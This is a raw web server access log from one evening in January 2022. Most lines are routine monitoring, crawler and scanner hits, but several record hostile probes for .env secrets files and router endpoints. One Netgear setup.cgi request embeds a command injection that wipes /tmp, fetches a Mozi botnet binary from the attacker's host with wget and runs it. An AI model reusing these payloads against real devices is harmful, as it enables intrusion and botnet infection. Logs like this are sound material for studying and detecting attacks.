212.91.246.72 - - [03/Jan/2022:18:57:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.212.143.182 - - [03/Jan/2022:18:58:07 +0100] "GET /.env HTTP/1.1" 404 309 "-" "curl/7.47.0"
212.91.246.72 - - [03/Jan/2022:18:58:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:18:59:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.56.78 - - [03/Jan/2022:19:00:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
2.56.56.78 - - [03/Jan/2022:19:00:09 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Jan/2022:19:00:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.251.102.74 - - [03/Jan/2022:19:00:45 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:19:01:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:02:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:03:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:04:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.56 - - [03/Jan/2022:19:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
212.91.246.72 - - [03/Jan/2022:19:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:06:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:07:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:08:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:09:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:10:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [03/Jan/2022:19:10:43 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0"
222.186.19.235 - - [03/Jan/2022:19:10:43 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0"
222.186.19.235 - - [03/Jan/2022:19:10:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
192.241.207.214 - - [03/Jan/2022:19:10:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
136.144.41.117 - - [03/Jan/2022:19:11:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Jan/2022:19:11:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.214 - - [03/Jan/2022:19:11:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.214 - - [03/Jan/2022:19:11:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
222.186.19.235 - - [03/Jan/2022:19:11:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [03/Jan/2022:19:11:59 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3"
222.186.19.235 - - [03/Jan/2022:19:11:59 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/11.04 Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.11"
183.136.225.56 - - [03/Jan/2022:19:12:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
212.91.246.72 - - [03/Jan/2022:19:12:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.246.143.7 - - [03/Jan/2022:19:12:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:19:13:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.214 - - [03/Jan/2022:19:13:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.214 - - [03/Jan/2022:19:14:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Jan/2022:19:14:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:15:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.214 - - [03/Jan/2022:19:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Jan/2022:19:16:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.214 - - [03/Jan/2022:19:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.214 - - [03/Jan/2022:19:17:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.214 - - [03/Jan/2022:19:17:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Jan/2022:19:17:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.207.214 - - [03/Jan/2022:19:17:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Jan/2022:19:18:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:19:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:20:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:21:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:22:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:23:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:24:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:25:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.56 - - [03/Jan/2022:19:26:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
212.91.246.72 - - [03/Jan/2022:19:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:27:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [03/Jan/2022:19:28:01 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/1.0.156.0 Safari/528.8"
222.186.19.235 - - [03/Jan/2022:19:28:01 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.55 Safari/525.19"
222.186.19.235 - - [03/Jan/2022:19:28:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
202.73.34.226 - - [03/Jan/2022:19:28:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [03/Jan/2022:19:28:16 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:19:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:29:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.73.34.226 - - [03/Jan/2022:19:30:20 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
202.73.34.226 - - [03/Jan/2022:19:30:21 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:19:30:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.212.143.182 - - [03/Jan/2022:19:30:26 +0100] "GET /.env HTTP/1.1" 404 309 "-" "curl/7.47.0"
212.91.246.72 - - [03/Jan/2022:19:31:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:32:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.212.143.182 - - [03/Jan/2022:19:32:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "curl/7.47.0"
212.91.246.72 - - [03/Jan/2022:19:33:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [03/Jan/2022:19:33:49 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
109.237.103.123 - - [03/Jan/2022:19:34:01 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:19:34:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.57.56 - - [03/Jan/2022:19:35:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:19:35:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.57.56 - - [03/Jan/2022:19:35:32 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Jan/2022:19:36:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:37:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:38:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:39:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:40:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:40:29 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:42:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:42:30 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:43:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.212.143.182 - - [03/Jan/2022:19:44:03 +0100] "GET /.env HTTP/1.1" 404 309 "-" "curl/7.47.0"
212.91.246.72 - - [03/Jan/2022:19:44:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:44:30 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:45:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:46:30 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:47:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.33.91.202 - - [03/Jan/2022:19:47:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
2.56.56.78 - - [03/Jan/2022:19:48:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
2.56.56.78 - - [03/Jan/2022:19:48:14 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Jan/2022:19:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:48:31 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:49:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:50:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:50:31 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
168.228.193.218 - - [03/Jan/2022:19:50:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Jan/2022:19:51:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:52:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:52:31 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:19:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.210 - - [03/Jan/2022:19:53:27 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
92.118.161.41 - - [03/Jan/2022:19:53:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
212.91.246.72 - - [03/Jan/2022:19:54:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.17.201.99 - - [03/Jan/2022:19:54:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.231.187.135 - - [03/Jan/2022:19:54:32 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
128.14.133.58 - - [03/Jan/2022:19:55:23 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:19:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
175.107.2.31 - - [03/Jan/2022:19:56:00 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.2.31:45571/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
210.17.201.99 - - [03/Jan/2022:19:56:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:19:56:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:56:32 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
67.210.239.55 - - [03/Jan/2022:19:57:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.05"
210.17.201.99 - - [03/Jan/2022:19:57:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:19:57:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:19:58:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:19:58:32 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
210.17.201.99 - - [03/Jan/2022:19:58:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:19:59:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.17.201.99 - - [03/Jan/2022:19:59:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
59.93.16.7 - - [03/Jan/2022:20:00:21 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [03/Jan/2022:20:00:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:00:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
210.17.201.99 - - [03/Jan/2022:20:01:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
2.56.57.56 - - [03/Jan/2022:20:01:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:20:01:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.57.56 - - [03/Jan/2022:20:01:26 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
210.17.201.99 - - [03/Jan/2022:20:02:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:20:02:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.17.201.99 - - [03/Jan/2022:20:02:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.231.187.135 - - [03/Jan/2022:20:02:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
210.17.201.99 - - [03/Jan/2022:20:02:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.142.125.193 - - [03/Jan/2022:20:03:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.193 - - [03/Jan/2022:20:03:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Jan/2022:20:03:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
136.144.41.117 - - [03/Jan/2022:20:03:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Jan/2022:20:04:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.17.201.99 - - [03/Jan/2022:20:04:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
162.231.187.135 - - [03/Jan/2022:20:04:33 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:06:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:06:34 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:07:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:08:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:08:34 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:09:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.150.36.211 - - [03/Jan/2022:20:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.05"
212.91.246.72 - - [03/Jan/2022:20:10:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:10:34 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:11:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.129.56.200 - - [03/Jan/2022:20:11:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
185.100.87.202 - - [03/Jan/2022:20:12:03 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:20:12:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:12:35 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:13:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:14:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
